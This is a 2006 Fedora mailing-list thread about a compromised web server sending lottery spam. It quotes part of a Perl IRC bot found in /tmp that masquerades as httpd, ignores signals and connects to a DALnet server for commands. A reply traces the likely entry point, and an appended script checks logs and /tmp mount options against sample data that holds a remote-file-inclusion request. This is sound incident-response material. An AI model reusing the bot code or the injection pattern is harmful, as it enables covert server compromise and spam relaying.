Postfix Problems

CodeHeads codeheads at gmail.com
Tue May 23 16:22:29 UTC 2006


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Tue, 23 May 2006 13:11:46 +0100 Paul Howarth <paul at city-fan.org> wrote:

> CodeHeads wrote:
> >> There is something wrong but I cannot nail it down.
> >>
> >> I am receiving hundreds of bounce backs from the web server I am running.
> >> Not sure how they are sending mail.  The only mail that should be sent is
> >> from forms.  Here is the header of one of the queues.  Maybe someone has run
> >> into this.
> >>
> >> V8
> >> T1147739033
> >> K1147739138
> >> N1
> >> P34672
> >> Mhost map: lookup (zdnetmail.com): deferred
> >> F8bs
> >> $_apache at localhost
> >> ${daemon_flags}c u
> >> Sapache
> >> Aapache at code-heads.com
> >> rRFC822; galactica7 at zdnetmail.com
> >> RPFD:galactica7 at zdnetmail.com
> >> H?P?Return-Path: <<81>g>
> >> H??Received: (from apache at localhost)
> >>         by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
> >>         Mon, 15 May 2006 20:23:53 -0400
> >> H?D?Date: Mon, 15 May 2006 20:23:53 -0400
> >> H?x?Full-Name: Apache
> >> H?M?Message-Id: <200605160023.k4G0NrpQ017524 at code-heads.com>
> >> H??To: galactica7 at zdnetmail.com
> >> H??Subject: WINNING NOTIFICATION
> >> H??From: NATIONAL LOTTERY <claimsagent_2006_2007 at yahoo.co.uk>
> >>
> >> What is bothering me is this:
> >> by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;
> 
> Right, that should tell you that the mail headers you are looking at 
> seem to be generated by something running as user apache (probably a 
> CGI/PHP script of some kind running via your web server), which is 
> calling the local sendmail on that server to send the mail out. It has 
> nothing to do with Postfix at all.
> 
> > Sorry again, but look what I found in the /tmp dir.
> > The whole thing is not copied and pasted:
> > #!/usr/bin/perl
> > # r00t teh pl4net! gr33t t0 Myhack at DALnet
> > # ------[eof]-----
> > 
> > 
> > 
> > system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print $1;}'`");
> > 
> > 
> > my $processo = 'httpd';
> > 
> > # morgan the code that you need to rip ends here
> > 
> > my @titi = ("Cube-|");
> > 
> > my $sleep='5';
> > my $linas_max='4';
> > my @adms=("apaii","KingFighter");
> > my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
> > my @canais=("#conn");
> > my $nick=  $titi[rand scalar @titi];
> > my $ircname =  $titi[rand scalar @titi];
> > chop (my $realname = $titi[rand scalar @titi]);
> > 
> > $servidor='rumble.dal.net' unless $servidor;
> > my $porta='6667';
> > my $VERSAO = '0.5';
> > $SIG{'INT'} = 'IGNORE';
> > $SIG{'HUP'} = 'IGNORE';
> > $SIG{'TERM'} = 'IGNORE';
> > $SIG{'CHLD'} = 'IGNORE';
> > $SIG{'PS'} = 'IGNORE';
> > use IO::Socket;
> > use Socket;
> > use IO::Select;
> > chdir("/");
> > $servidor="$ARGV[0]" if $ARGV[0];
> > $0="$processo"."\0"x16;;
> > my $pid=fork;
> > exit if $pid;
> > die "Problema com o fork: $!" unless defined($pid);
> > 
> > our %irc_servers;
> > our %DCC;
> > my $dcc_sel = new IO::Select->new();
> > 
> > $sel_cliente = IO::Select->new();
> > sub sendraw {
> >   if ($#_ == '1') {
> >     my $socket = $_[0];
> >     print $socket "$_[1]\n";
> >   } else {
> >       print $IRC_cur_socket "$_[0]\n";
> >   }
> > }
> > 
> > sub conectar {
> >    my $meunick = $_[0];
> >    my $servidor_con = $_[1];
> >    my $porta_con = $_[2];
> > 
> >    my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
> >    if (defined($IRC_socket)) {
> >      $IRC_cur_socket = $IRC_socket;
> > 
> > What I cannot understand is how someone can upload to the tmp dir.  I guess
> > I am still learning.  Can someone shed some light on this?
> 
> This is communicating with an IRC server, probably to listen for commands.
> 
> Look at the owner of the script. If it's apache, you can safely say that 
> a webserver exploit was used to upload it. You could try looking at the 
> timestamp of the file, and look in your web server log files for 
> suspicious activity at around that time to get a clue as to how it got 
> there.
> 
> If you have /tmp on a separate partition, I'd seriously consider 
> mounting it noexec,nodev. If it's not a separate partition, I'd 
> seriously consider making one for it on an Internet-exposed web server. 
> Same goes for /var.
> 
> Paul.
> 
That has since been removed and the system redone.  I have been keeping an eye
on /tmp and /var/tmp.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFEczbFfw3TK8jhZrsRAhN/AKDjZlDh+0bV++6XvBfWHBOVTZdIQQCgoVGJ
Unhz/IKmEViCNj3G+YzEZdk=
=T6xG
-----END PGP SIGNATURE-----
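As an added example (not code from the thread or from Fedora), the two steps Paul suggests, turned into checks that run offline: pull the web-server access-log lines recorded within a few minutes of the dropped file's modification time, and report which of noexec/nodev/nosuid a mount point is missing. The access log, the mounts table, the file and every address and path in it are constructed sample data, not from the incident.

```shell
#!/bin/sh
# Added example, not code from the thread.  Two checks that follow from the
# advice above:
#   logs_near_mtime    - access-log lines within +/- N minutes of a file's mtime
#   mount_missing_opts - which of noexec,nodev,nosuid a mount point lacks
# All sample data below is constructed; hostnames, paths and IPs are made up.
set -u

# awk helpers: convert an Apache timestamp "15/May/2006:20:21:47" plus "-0400"
# to a Unix epoch, without depending on GNU "date -d".
AWK_EPOCH='
function days_from_civil(y, m, d,    era, yoe, doy, doe) {
    # proleptic Gregorian date -> days since 1970-01-01 (Hinnant algorithm)
    y = (m <= 2) ? y - 1 : y
    era = int((y >= 0 ? y : y - 399) / 400)
    yoe = y - era * 400
    doy = int((153 * (m + (m > 2 ? -3 : 9)) + 2) / 5) + d - 1
    doe = yoe * 365 + int(yoe / 4) - int(yoe / 100) + doy
    return era * 146097 + doe - 719468
}
function log_epoch(ts, tz,    a, mon, wall, off) {
    split(ts, a, "[/:]")             # day Mon year hour min sec
    mon = (index("JanFebMarAprMayJunJulAugSepOctNovDec", a[2]) + 2) / 3
    wall = days_from_civil(a[3] + 0, mon, a[1] + 0) * 86400 + a[4] * 3600 + a[5] * 60 + a[6]
    off = (substr(tz, 2, 2) * 3600 + substr(tz, 4, 2) * 60) * (substr(tz, 1, 1) == "-" ? -1 : 1)
    return wall - off                # wall clock minus UTC offset = UTC epoch
}
'

# logs_near_mtime FILE ACCESS_LOG MINUTES
# Print the access-log lines stamped within +/- MINUTES of FILE's mtime.
# Note: mtime (%Y) can be reset by an intruder with touch; ctime (%Z) cannot.
logs_near_mtime() {
    mtime=$(stat -c %Y "$1") || return 2
    awk -v t="$mtime" -v w="$(( $3 * 60 ))" "$AWK_EPOCH"'
    {
        ts = substr($4, 2)                       # drop leading "["
        tz = substr($5, 1, length($5) - 1)       # drop trailing "]"
        e = log_epoch(ts, tz)
        if (e >= t - w && e <= t + w) print
    }' "$2"
}

# mount_missing_opts MOUNTS_FILE MOUNTPOINT
# Print the options (of noexec,nodev,nosuid) MOUNTPOINT lacks.  Returns 0 only
# when MOUNTPOINT is a separate mount carrying all three.
mount_missing_opts() {
    awk -v mp="$2" '
    $2 == mp {
        found = 1
        n = split($4, o, ",")
        for (i = 1; i <= n; i++) have[o[i]] = 1
        split("noexec nodev nosuid", want, " ")
        for (i = 1; i <= 3; i++)
            if (!(want[i] in have)) { sep = (miss == "") ? "" : ","; miss = miss sep want[i] }
    }
    END {
        if (!found) { print "not a separate mount"; exit 1 }
        if (miss != "") { print miss; exit 1 }
        exit 0
    }' "$1"
}

demo=$(mktemp -d)
trap 'rm -rf "$demo"' EXIT

# Constructed access log.  The two libwww-perl requests that feed a URL into a
# script parameter are a made-up illustration of "suspicious activity".
cat > "$demo/access_log" <<'EOF'
192.0.2.10 - - [15/May/2006:19:40:12 -0400] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.0.2.55 - - [15/May/2006:20:21:47 -0400] "GET /gallery/view.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 812 "-" "libwww-perl/5.803"
192.0.2.55 - - [15/May/2006:20:22:03 -0400] "GET /gallery/view.php?page=http://203.0.113.9/x.txt&c=id HTTP/1.1" 200 311 "-" "libwww-perl/5.803"
198.51.100.7 - - [15/May/2006:21:40:00 -0400] "GET /contact.html HTTP/1.1" 200 2201 "-" "Mozilla/4.0"
EOF

# The dropped file, given an mtime of 15 May 2006 20:22:10 -0400
# (16 May 00:22:10 UTC, epoch 1147738930); -t is POSIX, so set TZ explicitly.
: > "$demo/dropped.pl"
TZ=UTC touch -t 200605160022.10 "$demo/dropped.pl"

# Constructed /proc/mounts excerpt: /tmp is a separate partition but only nosuid.
cat > "$demo/mounts" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
/dev/sda3 /tmp ext3 rw,nosuid 0 0
/dev/sda4 /var ext3 rw,noexec,nodev,nosuid 0 0
EOF

echo "== access-log lines within 5 minutes of dropped.pl mtime =="
logs_near_mtime "$demo/dropped.pl" "$demo/access_log" 5
echo "== options /tmp is missing =="
mount_missing_opts "$demo/mounts" /tmp || echo "(remount /tmp with those options and add them to /etc/fstab)"
```

Two caveats worth keeping in mind when running this against a real box. First, noexec stops the kernel from executing the dropped file directly, but `perl /tmp/dropped.pl` still works because the interpreter, not the kernel, reads it; noexec raises the bar, it does not close the hole the web application opened. Second, the bot above rewrites `$0` to `httpd`, so `ps` shows it under the web server's name; that is why Paul's advice starts from the file's owner and timestamps rather than from the process list, and why the ctime (`stat -c %Z`) is the more trustworthy of the two timestamps.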




More information about the fedora-list mailing list